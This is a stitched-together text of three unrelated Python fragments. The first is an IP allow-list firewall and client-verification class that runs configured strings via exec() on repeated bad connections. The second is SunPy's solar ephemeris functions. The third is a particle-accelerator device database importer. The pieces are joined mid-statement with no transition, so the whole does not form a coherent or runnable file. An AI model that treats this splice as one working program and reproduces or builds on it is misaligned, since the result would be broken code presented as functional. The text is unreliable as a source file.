count, verified, user = self._client_cache.get(ip)
_m, _el, self.__ol = __header.method, __header.option, __header.option_liev
LOGS_.call.logg(10, CNF.STRINGS.IP_BOARD_PASSED % (user, self.wrapper_call__()), ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.quest)
if search(self.drop, _m):
LOGS_.call.logg(30, CNF.STRINGS.CALL_DROP % __header.header, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
if user is None:
if verified:
LOGS_.call.logg(10, __o, mt=self.call, ico=CNF.PRINT_ICOS.call)
return __o.__call__(**kwargs)
if search(self._none_accept, _m):
LOGS_.call.logg(10 + CNF.SIDE_[True] * 15, __o, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.call)
return __o.__call__(**kwargs)
LOGS_.call.logg(30, CNF.STRINGS.CALL_DROP % __header.header, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
if self._read_rule(user, _m, _el):
_m = _m.decode(CNF.SRM_ENC)
if user in self.call_cache and _m in self.call_cache[user]:
lim = self.call_cache[user][_m]
if lim[1] == lim[0]:
LOGS_.call.logg(40, CNF.STRINGS.CALL_LIM % (__o, lim), ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
self.call_cache[user][_m][1] += 1
LOGS_.call.logg(20, __o, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.call)
return __o.__call__(**kwargs)
LOGS_.call.logg(30, CNF.STRINGS.CALL_DROP % __header.header, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
########################################################################################################################
########################################################################################################################
class SimpleFireWall:
def __init__(self):
self._defifendifFW = DefIfEndIf(CNF.BOARD_CLIENT_RULE, *CNF.IFDEFENDIF['BOARD_CLIENT_RULE'])
self.client_cache: dict[str: list[int, bool, str]] = dict()
self.client_set: set[tuple] = set()
self.client_ip: str = str()
self.received_port: int = int()
self.bad_client_counter = 0
self.interval_start = int(time())
@lru_cache(20)
def _read_board(self, client_ip) -> bool:
if not self._defifendifFW.configured:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CLIENT_RULE', ip=self.client_ip, cache=self.client_cache, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_board)
return True
_rrc = self._defifendifFW.read_rc()
_configured = False
while True:
try:
ln = next(_rrc)
ip = search(b"^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}", ln)
if not ip: continue
_configured = True
if search(ip_rex(ip.group().decode(CNF.LOC_ENC)), client_ip): raise EOFError
except StopIteration:
LOGS_.firewall.logg(40, CNF.STRINGS.IP % self.client_ip, ip=self.client_ip, cache=self.client_cache, mt=self._read_board, ico=CNF.PRINT_ICOS.sharp)
self.bad_client_counter += 1
return False
except EOFError:
_rrc.close()
return True
finally:
if not _configured:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CLIENT_RULE', ip=self.client_ip, cache=self.client_cache, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_board)
def wrapper_ips__(self, clear_cache:bool=False):
wrapper_info = self._read_board.cache_info()
if clear_cache: self._read_board.cache_clear()
return wrapper_info
def _clean_overflow(self):
LOGS_.blackbox.logg(54, CNF.STRINGS.OVERFLOW.join(['\n' + ip for ip in self.client_cache if not self.client_cache[ip][1]]), ip=self.client_ip, cache=self.client_cache, mt=self._clean_overflow, ico=CNF.PRINT_ICOS.sharp)
for ip in list(self.client_cache):
if not self.client_cache[ip][1]:
self.client_cache.pop(ip)
def fw_reset(self):
for ip in list(self.client_cache):
if not self.client_cache[ip][1]:
self.client_cache.pop(ip)
self.bad_client_counter = 0
self.wrapper_ips__(clear_cache=True)
def fw_full_reset(self):
self.client_cache.clear()
self.bad_client_counter = 0
self.received_port = int()
self.interval_start = time()
self.client_ip = str()
self.wrapper_ips__(clear_cache=True)
def _check_interval(self):
actual = time()
if self.interval_start + CNF.FIREWALL_RESET_INTERVAL < actual:
LOGS_.firewall.logg(20, CNF.STRINGS.FW_AUTO_RESET % (actual, self.interval_start), ip=self.client_ip, cache=self.client_cache, mt=self._check_interval, ico=CNF.PRINT_ICOS.sharp)
self.interval_start = actual
self.fw_reset()
def ip_on_board(self, tox_sock) -> bool:
legal = self._read_board(self.client_ip)
LOGS_.firewall.logg(10, CNF.STRINGS.IP_BOARD_PASSED % (self.client_ip, self.wrapper_ips__()), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.sharp)
self._check_interval()
hits = self.wrapper_ips__().hits
if not legal and hits >= CNF.MAX_BAD_CLIENT_HIT_LV3:
LOGS_.firewall.logg(55, CNF.STRINGS.DOS % (self.client_ip, 3), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENT_HIT_EXEC_LV3)
elif not legal and hits >= CNF.MAX_BAD_CLIENT_HIT_LV2:
LOGS_.firewall.logg(55, CNF.STRINGS.DOS % (self.client_ip, 2), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENT_HIT_EXEC_LV2)
elif not legal and hits >= CNF.MAX_BAD_CLIENT_HIT_LV1:
LOGS_.firewall.logg(55, CNF.STRINGS.DOS % (self.client_ip, 1), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENT_HIT_EXEC_LV1)
if not legal and self.bad_client_counter >= CNF.MAX_BAD_CLIENTS_LV3:
LOGS_.firewall.logg(55, CNF.STRINGS.DDOS % (self.client_ip, 3), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENTS_EXEC_LV3)
elif not legal and self.bad_client_counter >= CNF.MAX_BAD_CLIENTS_LV2:
LOGS_.firewall.logg(55, CNF.STRINGS.DDOS % (self.client_ip, 2), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENTS_EXEC_LV2)
elif not legal and self.bad_client_counter >= CNF.MAX_BAD_CLIENTS_LV1:
LOGS_.firewall.logg(55, CNF.STRINGS.DDOS % (self.client_ip, 1), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENTS_EXEC_LV1)
if not legal and CNF.MAXSIZE_TOXICS:
LOGS_.firewall.logg(54, CNF.STRINGS.TOX, ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.tox)
log_bad_data(self.client_ip, tox_sock)
return legal
def client_is_verified(self, tox_sock=None) -> bool:
if not self.client_ip or self.client_ip == "": return False
self.client_cache.setdefault(self.client_ip, [0, False, None])
if (_cc := self.client_cache.get(self.client_ip)) and _cc[1]: return True
if not _cc: return False
LOGS_.firewall.logg(20 + (_cc[0] > 2) * 10, CNF.STRINGS.UNVERIFIED, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.sharp)
if tox_sock and CNF.MAXSIZE_TOXICS:
LOGS_.firewall.logg(54, CNF.STRINGS.TOX, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.tox)
log_bad_data(self.client_ip, tox_sock)
if _cc[0] > CNF.MAX_UNVERIFIED_LV3:
LOGS_.firewall.logg(55, CNF.STRINGS.LOGIN_LV % 3, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_UNVERIFIED_EXEC_LV3)
elif _cc[0] > CNF.MAX_UNVERIFIED_LV2:
LOGS_.firewall.logg(55, CNF.STRINGS.LOGIN_LV % 2, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_UNVERIFIED_EXEC_LV2)
elif _cc[0] > CNF.MAX_UNVERIFIED_LV1:
LOGS_.firewall.logg(55, CNF.STRINGS.LOGIN_LV % 1, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_UNVERIFIED_EXEC_LV1)
if len(self.client_cache) > CNF.MAX_CLIENT_CACHE:
self._clean_overflow()
return False
def port_handshake(self, header) -> None:
self.received_port = header.option_int
########################################################################################################################
########################################################################################################################
class Verification(SimpleFireWall):
def __init__(self):
SimpleFireWall.__init__(self)
self.local_login: str = None
self._pair_pair:tuple[str, int] = tuple()
self._pair_parts: dict = dict()
self.lapsdelset: set = set()
def solve_paring(self, options, pipe):
try:
part = options.get("T")
if not self._pair_parts.get(part): raise KeyError(CNF.STRINGS.fe_INVALID_PART % part)
if search(ip_rex(self._pair_pair[0]), self.client_ip):
if int(time()) - self._pair_pair[1] < CNF.PARING_LIFETIME:
self.verify()
with open(self._pair_parts[part], 'wb') as f:
for _ in CNF.BUFFER_ITER(options["l"]):
dat = pipe.get(CNF.DAT_SOCK_BUFFER)
if not dat: raise BufferError(CNF.STRINGS.fe_WRONG_LENGTH)
f.write(dat)
self._pair_parts.pop(part)
else: raise AssertionError(CNF.STRINGS.fe_TIMEOUT % (int(time()) - self._pair_pair[1]))
else: raise AssertionError(CNF.STRINGS.fe_COMPANION % (self._pair_pair[0], self.client_ip))
if len(list(self._pair_parts)) == 0:
self._pair_pair = tuple()
raise ConnectionResetError('*pres*')
except Exception as e:
if e.args == ('*pres*',):
LOGS_.firewall.logg(35, CNF.STRINGS.PARED % self.client_ip, ip=self.client_ip, cache=self.client_cache, mt=self.solve_paring, ico=CNF.PRINT_ICOS.key)
else:
LOGS_.firewall.logg(40 + CNF.SENSITIVE_PARING * 15, type(e), e, ip=self.client_ip, cache=self.client_cache, mt=self.solve_paring)
self._pair_pair = (tuple() if CNF.SENSITIVE_PARING else self._pair_pair)
self._pair_parts = (dict() if CNF.SENSITIVE_PARING else self._pair_parts)
raise ConnectionResetError
finally:
del options
def get_paring(self, options):
try:
if search(ip_rex(self._pair_pair[0]), self.client_ip):
if time() - self._pair_pair[1] < CNF.PARING_LIFETIME:
self.login(ParseStreamHeader(options.get("T").encode(CNF.SRM_ENC)))
if self.client_is_verified():
| |
# -*- coding: utf-8 -*-
"""
Ephemeris calculations using SunPy coordinate frames
"""
import datetime
import warnings
import numpy as np
import astropy.units as u
from astropy.time import Time
from astropy.coordinates import (SkyCoord, Angle, Longitude,
ICRS, PrecessedGeocentric, AltAz,
get_body_barycentric)
from astropy.coordinates.representation import CartesianRepresentation, SphericalRepresentation
from astropy._erfa.core import ErfaWarning
from astropy.constants import c as speed_of_light
# Versions of Astropy that do not have HeliocentricMeanEcliptic have the same frame
# with the misleading name HeliocentricTrueEcliptic
try:
from astropy.coordinates import HeliocentricMeanEcliptic
except ImportError:
from astropy.coordinates import HeliocentricTrueEcliptic as HeliocentricMeanEcliptic
from sunpy.time import parse_time
from sunpy import log
from sunpy.util.decorators import add_common_docstring, deprecated
from sunpy.time.time import _variables_for_parse_time_docstring
from .frames import HeliographicStonyhurst as HGS
from .transformations import _SUN_DETILT_MATRIX, _SOLAR_NORTH_POLE_HCRS
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__all__ = ['get_body_heliographic_stonyhurst', 'get_earth',
'get_sun_B0', 'get_sun_L0', 'get_sun_P', 'get_sunearth_distance',
'get_sun_orientation', 'get_horizons_coord']
@add_common_docstring(**_variables_for_parse_time_docstring())
def get_body_heliographic_stonyhurst(body, time='now', observer=None):
"""
Return a `~sunpy.coordinates.frames.HeliographicStonyhurst` frame for the location of a
solar-system body at a specified time. The location can be corrected for light travel time
to an observer.
Parameters
----------
body : `str`
The solar-system body for which to calculate positions
time : {parse_time_types}
Time to use in a parse_time-compatible format
observer : `~astropy.coordinates.SkyCoord`
If None, the returned coordinate is the instantaneous or "true" location.
If not None, the returned coordinate is the astrometric location (i.e., accounts for light
travel time to the specified observer)
Returns
-------
out : `~sunpy.coordinates.frames.HeliographicStonyhurst`
Location of the solar-system body in the `~sunpy.coordinates.HeliographicStonyhurst` frame
Notes
-----
There is no correction for aberration due to observer motion. For a body close to the Sun in
angular direction relative to the observer, the correction can be negligible because the
apparent location of the body will shift in tandem with the Sun.
"""
obstime = parse_time(time)
if observer is None:
body_icrs = get_body_barycentric(body, obstime)
else:
observer_icrs = SkyCoord(observer).icrs.cartesian
# This implementation is modeled after Astropy's `_get_apparent_body_position`
light_travel_time = 0.*u.s
emitted_time = obstime
delta_light_travel_time = 1.*u.s # placeholder value
while np.any(np.fabs(delta_light_travel_time) > 1.0e-8*u.s):
body_icrs = get_body_barycentric(body, emitted_time)
distance = (body_icrs - observer_icrs).norm()
delta_light_travel_time = light_travel_time - distance / speed_of_light
light_travel_time = distance / speed_of_light
emitted_time = obstime - light_travel_time
log.info(f"Apparent body location accounts for {light_travel_time.to('s').value:.2f}"
" seconds of light travel time")
body_hgs = ICRS(body_icrs).transform_to(HGS(obstime=obstime))
return body_hgs
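# A minimal usage sketch (return values omitted here; they depend on the ephemeris in use):
#   >>> from sunpy.coordinates import get_body_heliographic_stonyhurst
#   >>> venus = get_body_heliographic_stonyhurst('venus', '2012-06-06 04:07:29')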
@add_common_docstring(**_variables_for_parse_time_docstring())
def get_earth(time='now'):
"""
Return a `~astropy.coordinates.SkyCoord` for the location of the Earth at a specified time in
the `~sunpy.coordinates.frames.HeliographicStonyhurst` frame. The longitude will be 0 by definition.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
out : `~astropy.coordinates.SkyCoord`
Location of the Earth in the `~sunpy.coordinates.frames.HeliographicStonyhurst` frame
"""
earth = get_body_heliographic_stonyhurst('earth', time=time)
# Explicitly set the longitude to 0
earth = SkyCoord(0*u.deg, earth.lat, earth.radius, frame=earth)
return earth
@add_common_docstring(**_variables_for_parse_time_docstring())
def get_horizons_coord(body, time='now', id_type='majorbody'):
"""
Queries JPL HORIZONS and returns a `~astropy.coordinates.SkyCoord` for the location of a
solar-system body at a specified time. This location is the instantaneous or "true" location,
and is not corrected for light travel time or observer motion.
.. note::
This function requires the Astroquery package to be installed and
requires an Internet connection.
Parameters
----------
body : `str`
The solar-system body for which to calculate positions. One can also use the search form
linked below to find valid names or ID numbers.
id_type : `str`
If 'majorbody', search by name for planets, satellites, or other major bodies.
If 'smallbody', search by name for asteroids or comets.
If 'id', search by ID number.
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
`~astropy.coordinates.SkyCoord`
Location of the solar-system body
Notes
-----
Be aware that there can be discrepancies between the coordinates returned by JPL HORIZONS,
the coordinates reported in mission data files, and the coordinates returned by
`~sunpy.coordinates.get_body_heliographic_stonyhurst`.
References
----------
* `JPL HORIZONS <https://ssd.jpl.nasa.gov/?horizons>`_
* `JPL HORIZONS form to search bodies <https://ssd.jpl.nasa.gov/horizons.cgi?s_target=1#top>`_
* `Astroquery <https://astroquery.readthedocs.io/en/latest/>`_
Examples
--------
.. Run these tests with a temp cache dir
.. testsetup::
>>> from astropy.config.paths import set_temp_cache
>>> import tempfile
>>> c = set_temp_cache(tempfile.mkdtemp())
>>> _ = c.__enter__()
>>> from sunpy.coordinates import get_horizons_coord
Query the location of Venus
>>> get_horizons_coord('Venus barycenter', '2001-02-03 04:05:06') # doctest: +REMOTE_DATA
INFO: Obtained JPL HORIZONS location for Venus Barycenter (2) [sunpy.coordinates.ephemeris]
<SkyCoord (HeliographicStonyhurst: obstime=2001-02-03T04:05:06.000): (lon, lat, radius) in (deg, deg, AU)
(-33.93155883, -1.64998481, 0.71915147)>
Query the location of the SDO spacecraft
>>> get_horizons_coord('SDO', '2011-11-11 11:11:11') # doctest: +REMOTE_DATA
INFO: Obtained JPL HORIZONS location for Solar Dynamics Observatory (spac [sunpy.coordinates.ephemeris]
<SkyCoord (HeliographicStonyhurst: obstime=2011-11-11T11:11:11.000): (lon, lat, radius) in (deg, deg, AU)
(0.01018888, 3.29640407, 0.99011042)>
Query the location of the SOHO spacecraft via its ID number (-21)
>>> get_horizons_coord(-21, '2004-05-06 11:22:33', 'id') # doctest: +REMOTE_DATA
INFO: Obtained JPL HORIZONS location for SOHO (spacecraft) (-21) [sunpy.coordinates.ephemeris]
<SkyCoord (HeliographicStonyhurst: obstime=2004-05-06T11:22:33.000): (lon, lat, radius) in (deg, deg, AU)
(0.2523461, -3.55863351, 0.99923086)>
.. testcleanup::
>>> _ = c.__exit__()
"""
obstime = parse_time(time)
# Import here so that astroquery is not a module-level dependency
from astroquery.jplhorizons import Horizons
query = Horizons(id=body, id_type=id_type,
location='500@10', # Heliocentric (mean ecliptic)
epochs=obstime.tdb.jd) # Time must be provided in JD TDB
try:
result = query.vectors()
except Exception: # Catch and re-raise all exceptions, and also provide query URL if generated
if query.uri is not None:
log.error(f"See the raw output from the JPL HORIZONS query at {query.uri}")
raise
log.info(f"Obtained JPL HORIZONS location for {result[0]['targetname']}")
vector = CartesianRepresentation(result[0]['x', 'y', 'z'])*u.AU
coord = SkyCoord(vector, frame=HeliocentricMeanEcliptic, obstime=obstime)
return coord.transform_to(HGS)
# The code beyond this point should be moved to sunpy.coordinates.sun after the deprecation period
@add_common_docstring(**_variables_for_parse_time_docstring())
def _B0(time='now'):
"""
Return the B0 angle for the Sun at a specified time, which is the heliographic latitude of the
Sun-disk center as seen from Earth. The range of B0 is +/-7.23 degrees.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
out : `~astropy.coordinates.Angle`
The B0 angle
"""
return Angle(get_earth(time).lat)
# Function returns a SkyCoord's longitude in the de-tilted frame (HCRS rotated so that the Sun's
# rotation axis is aligned with the Z axis)
def _detilt_lon(coord):
coord_detilt = coord.hcrs.cartesian.transform(_SUN_DETILT_MATRIX)
return coord_detilt.represent_as(SphericalRepresentation).lon.to('deg')
# J2000.0 epoch
_J2000 = Time('J2000.0', scale='tt')
# One of the two nodes of intersection between the ICRF equator and Sun's equator in HCRS
_NODE = SkyCoord(_SOLAR_NORTH_POLE_HCRS.lon + 90*u.deg, 0*u.deg, frame='hcrs')
# The longitude in the de-tilted frame of the Sun's prime meridian.
# Seidelmann et al. (2007) and earlier define the apparent longitude of the meridian as seen from
# Earth as 84.10 degrees eastward from the above-defined node of intersection.
# Seidelmann et al. (2007) and later also define the true longitude of the meridian (i.e., without
# light travel time to Earth) as 84.176 degrees eastward, but the apparent longitude is needed.
_DLON_MERIDIAN = Longitude(_detilt_lon(_NODE) + 84.10*u.deg)
@add_common_docstring(**_variables_for_parse_time_docstring())
def _L0(time='now'):
"""
Return the L0 angle for the Sun at a specified time, which is the Carrington longitude of the
Sun-disk center as seen from Earth.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
`~astropy.coordinates.Longitude`
The Carrington longitude
Notes
-----
This longitude is calculated using the values from Seidelmann et al. (2007), with care taken to
use the longitude as seen from Earth (see that paper's Appendix).
References
----------
* Seidelmann et al. (2007), "Report of the IAU/IAG Working Group on cartographic coordinates
and rotational elements: 2006" `(link) <http://dx.doi.org/10.1007/s10569-007-9072-y>`_
"""
obstime = parse_time(time)
# Calculate the de-tilt longitude of the meridian due to the Sun's sidereal rotation
dlon_meridian = Longitude(_DLON_MERIDIAN + (obstime - _J2000) * 14.1844*u.deg/u.day)
# Calculate the de-tilt longitude of the Earth
dlon_earth = _detilt_lon(get_earth(obstime))
return Longitude(dlon_earth - dlon_meridian)
@add_common_docstring(**_variables_for_parse_time_docstring())
def _P(time='now'):
"""
Return the position (P) angle for the Sun at a specified time, which is the angle between
geocentric north and solar north as seen from Earth, measured eastward from geocentric north.
The range of P is +/-26.3 degrees.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
out : `~astropy.coordinates.Angle`
The position angle
"""
obstime = parse_time(time)
# Define the frame where its Z axis is aligned with geocentric north
geocentric = PrecessedGeocentric(equinox=obstime, obstime=obstime)
return _sun_north_angle_to_z(geocentric)
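# Hedged usage sketch (not in the original source): the three private helpers above
# give the classic solar ephemeris triple (B0, L0, P) for a single observation time.
# The helper name and the default date are made up for illustration.
def _example_solar_ephemeris(time='2020-01-01'):
    return _B0(time), _L0(time), _P(time)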
@add_common_docstring(**_variables_for_parse_time_docstring())
def _earth_distance(time='now'):
"""
Return the distance between the Sun and the Earth at a specified time.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
{1} that causes condition {2}.'.format(len(inputs), fault.name, condition.name)))
elif (len(fault.inputs) == 0):
print(('ERROR: no inputs found for fault {0} that causes condition {1}.'.format(fault.name, condition.name)))
# Finally, get the device that triggers the condition
device = None
try:
device = self.session.query(models.Device).\
filter(models.Device.id==fault.inputs[0].device_id).one()
except:
print(('ERROR: cannot find the device that triggers condition {0}.'.format(condition.name)))
return device
# Check if the device in the 'cond_area' should be used
# as ignore condition for the device in 'device_area'
def check_area_order(self, cond_area, device_area):
cond = False
if (device_area.upper() == 'DIAG0' and
(cond_area.upper() == 'GUNB' or
cond_area.upper() == 'HTR' or
cond_area.upper() == 'LR00')):
cond = True
elif (device_area.upper().endswith('H') and
(not cond_area.upper().endswith('S'))):
cond = True
elif (device_area.upper().endswith('S') and
(not cond_area.upper().endswith('H'))):
cond = True
elif (cond_area != 'DIAG0'):
cond = True
return cond
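# Illustrative expectations (not in the original importer), derived from the branches
# above; kept as comments because this sits inside the importer class body:
#   self.check_area_order('GUNB', 'DIAG0')  -> True   (first branch: GUNB is upstream of DIAG0)
#   self.check_area_order('DIAG0', 'GUNB')  -> False  (falls through every branch)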
def add_ignore_conditions_analog(self, device, evl=0):
try:
conditions = self.session.query(models.Condition).all()
except:
print('INFO: Found no conditions to ignore')
return
if evl > 0:
return
for cond in conditions:
cond_device = self.find_condition_input_device(cond)
if (cond_device != None):
# The location of the cond_device must be before the location of the device
# to be ignored
try:
cond_device_z = float(cond_device.z_location)
device_z = float(device.z_location)
if (cond_device_z < device_z):
if (self.check_area_order(cond_device.area, device.area)):
ignore_condition = models.IgnoreCondition(condition=cond, device = device)
except:
print(('WARN: invalid z_location condition_device={0}, device={1}'.format(cond_device.z_location, device.z_location)))
def add_analog_device(self, directory, card_name, add_ignore=False):
# if (self.lcls1_only and card_name == "BPM"):
# return
sys.stdout.write('Adding {}\n'.format(directory))
file_name = directory + '/DeviceType.csv'
[device_type, evaluation_string, measured_device_type_id] = self.check_device_type(file_name)
if (device_type == None):
return
if (self.lcls1_only and (device_type.name == 'PBLM' or
device_type.name == 'LBLM')):
print(('* Skipping {} devices'.format(device_type.name)))
return
file_name = directory + '/DeviceStates.csv'
[faults, device_states] = self.add_device_states(file_name, device_type,True)
#print faults
# Read AnalogChannels, each device has one channel
file_name = directory + '/AnalogChannels.csv'
f = open(file_name)
line = f.readline().strip()
fields=[]
for field in line.split(','):
fields.append(str(field).lower())
channel={}
while line:
channel_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
channel_info[fields[field_index]]=property
field_index = field_index + 1
channel[channel_info['name']]=channel_info
f.close()
# Read Mitigation list
file_name = directory + '/Mitigation.csv'
mitigation = self.read_mitigation(file_name)
# Devices!
file_name = directory + '/Devices.csv'
f = open(file_name)
line = f.readline().strip()
fields=[]
for field in line.split(','):
fields.append(str(field).lower())
while line:
device_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
device_info[fields[field_index]]=property
field_index = field_index + 1
try:
app_card = self.session.query(models.ApplicationCard).\
filter(models.ApplicationCard.id==int(device_info['application_card_number'])).one()
if app_card.name != card_name:
print(('ERROR: analog device ({0}) assigned to unexpected card type ({1}), expected {2} card'.\
format(device_info['device'], app_card.name, card_name)))
return
except:
print(('ERROR: Cannot find application_card with id {0}, exiting...'.format(device_info['application_card_number'])))
return
# If LCLS-I only option is enabled, only add device if it belongs to an LCLS-I
# reporting crate
if (self.lcls1_only and not self.is_lcls1_ln(app_card)):
continue
# there must be only one channel
if len(channel) != 1:
print('ERROR: expected exactly one channel defined for AnalogDevice, found {}'.format(len(channel)))
return
for key in channel:
channel_name = key
mps_channel_index = channel[channel_name]['mps_channel_#']
channel_number = int(device_info['mps_channel_#' + mps_channel_index])
analog_channel = models.AnalogChannel(name=channel[key]['name'],
number=channel_number, card_id=app_card.id)
self.session.add(analog_channel)
self.session.commit()
self.session.refresh(analog_channel)
# Check if device has an 'enable' column, and don't add if it has a 0
#if 'enable' in device_info:
# if device_info['enable'] == '0':
# continue # do not add if device has enable=0
cab_num = "N/A"
off = 0
slo = 1
if 'cable_#' in device_info:
cab_num = device_info['cable_#']
if 'offset' in device_info:
off = device_info['offset']
if 'slope' in device_info:
slo = device_info['slope']
device = models.AnalogDevice(name=device_info['device'],
device_type=device_type,
channel=analog_channel,
card=app_card,
position=device_info['position'],
z_location=device_info['linac_z'],
description=device_info['device'] + ' ' + device_type.description,
area=device_info['area'],
evaluation=1, # Fast evaluation
cable_number=cab_num,
slope=slo,
offset=off)
if (self.verbose):
print(('Analog Channel: ' + device_info['device']))
self.session.add(device)
self.session.commit()
self.session.refresh(device)
# If device should be ignored, add conditions
if (add_ignore):
self.add_ignore_conditions_analog(device, int(device_info['always_evaluate']))
# For each device - create a Faults, FaultInputs, FaultStates and the AllowedClasses
if device_info['fault'] != 'all':
device_fault = self.getFault(faults, device_info['fault'])
if (device_fault == None):
print(('ERROR: Failed to find Fault for analog device "{}"'.format(device_info['device'])))
exit(-1)
#device_fault = models.Fault(name=device_info['fault'], description=device_info['device'] + ' Fault')
self.session.add(device_fault)
self.session.commit()
self.session.refresh(device_fault)
device_fault_input = models.FaultInput(bit_position=0, device=device, fault=device_fault)
self.session.add(device_fault_input)
self.session.commit()
self.session.refresh(device_fault_input)
# FaultStates (given by the Mitigation.csv file), entries whose Device_Location matches the device
for k in mitigation:
if device_info['mitigation'] == k:
for m in mitigation[device_info['mitigation']]:
# only add new FaultState if there isn't one already for the combination Fault/DeviceState
fault_states = self.session.query(models.FaultState).filter(models.FaultState.fault_id==device_fault.id).all()
fault_state_exists = False
if (len(fault_states)>0):
for fs in fault_states:
# print 'Found fault_state fault_id={0}, device_state_id={1}'.\
# format(fs.fault_id, fs.device_state_id)
if fs.device_state_id == device_states[m].id:
fault_state_exists = True
if (not fault_state_exists):
# print 'Adding fault state for {0} (fault_id={1}, device_state_id={2}'.\
# format(device_info['device'], device_fault.id, device_states[m].id)
fault_state = models.FaultState(device_state=device_states[m], fault=device_fault)
self.session.add(fault_state)
self.session.commit()
self.session.refresh(fault_state)
# Add the AllowedClasses for each fault state (there may be multiple per FaultState)
for d in self.beam_destinations:
power_class_str = mitigation[device_info['mitigation']][device_states[m].name][d.lower()]
if (power_class_str != '-'):
beam_class = self.session.query(models.BeamClass).\
filter(models.BeamClass.id==int(power_class_str)).one()
beam_destination = self.session.query(models.BeamDestination).\
filter(models.BeamDestination.name==d).one()
fault_state.add_allowed_class(beam_class=beam_class, beam_destination=beam_destination)
else: # if fault=='all'
mit_location = device_info['mitigation']
for fault in faults:
fault_name = faults[fault]['name']
fault_desc = device_info['fault_name']
device_fault = models.Fault(name=fault_name,description=fault_desc)
self.session.add(device_fault)
self.session.commit()
self.session.refresh(device_fault)
device_fault_input = models.FaultInput(bit_position=0, device=device, fault=device_fault)
self.session.add(device_fault_input)
self.session.commit()
self.session.refresh(device_fault_input)
for fs in faults[fault]['states']:
fault_state = models.FaultState(device_state=device_states[fs], fault=device_fault)
self.session.add(fault_state)
self.session.commit()
self.session.refresh(fault_state)
for d in self.beam_destinations:
power_class_str = mitigation[mit_location][fs][d.lower()]
if (power_class_str != '-'):
beam_class = self.session.query(models.BeamClass).\
filter(models.BeamClass.id==int(power_class_str)).one()
beam_destination = self.session.query(models.BeamDestination).\
filter(models.BeamDestination.name==d).one()
fault_state.add_allowed_class(beam_class=beam_class, beam_destination=beam_destination)
self.session.commit()
f.close()
def is_lcls1_ln(self, app_card):
try:
app_crate = self.session.query(models.Crate).\
filter(models.Crate.id==app_card.crate_id).one()
except:
return False
slots = []
for n in app_crate.link_nodes:
slots.append(n.slot_number)
for ln in app_crate.link_nodes:
if (app_card.slot_number == ln.slot_number or
(ln.slot_number == 2 and not app_card.slot_number in slots)):
link_node = ln
if (link_node.ln_type == 3 or link_node.ln_type == 1):
return True
else:
return False
#(venv)[lpiccoli@lcls-dev3 PROF]$ ll
#
# DeviceStates.csv
# DeviceType.csv
# Devices.csv
# DigitalChannels.csv
# Mitigation.csv
def add_digital_device(self, directory, card_name="Digital Card"):
print(('Adding ' + directory))
# Virtual Card means it is a Digital Card, but signals must be
# mapped to inputs 32 to 47 (lower 32 inputs are digital inputs
# for external HW)
is_virtual = False
if (card_name == 'Virtual Card'):
is_virtual = True
card_name = 'Digital Card'
# Find the device type
file_name = directory + '/DeviceType.csv'
[device_type, evaluation_string, measured_device_type_id] = self.check_device_type(file_name)
if device_type == None:
return
# Add DeviceStates
file_name = directory + '/DeviceStates.csv'
[faults, device_states] = self.add_device_states(file_name, device_type, False)
# Add DigitalChannels, first read the channels for one device
file_name = directory + '/DigitalChannels.csv'
soft = False
try:
f = open(file_name)
except:
file_name = directory + '/SoftChannels.csv'
soft=True
if soft:
try:
f = open(file_name)
except:
print(('ERROR: No file found ({0})'.format(file_name)))
return
line = f.readline().strip()
fields=[]
for field in line.split(','):
fields.append(str(field).lower())
channel={}
while line:
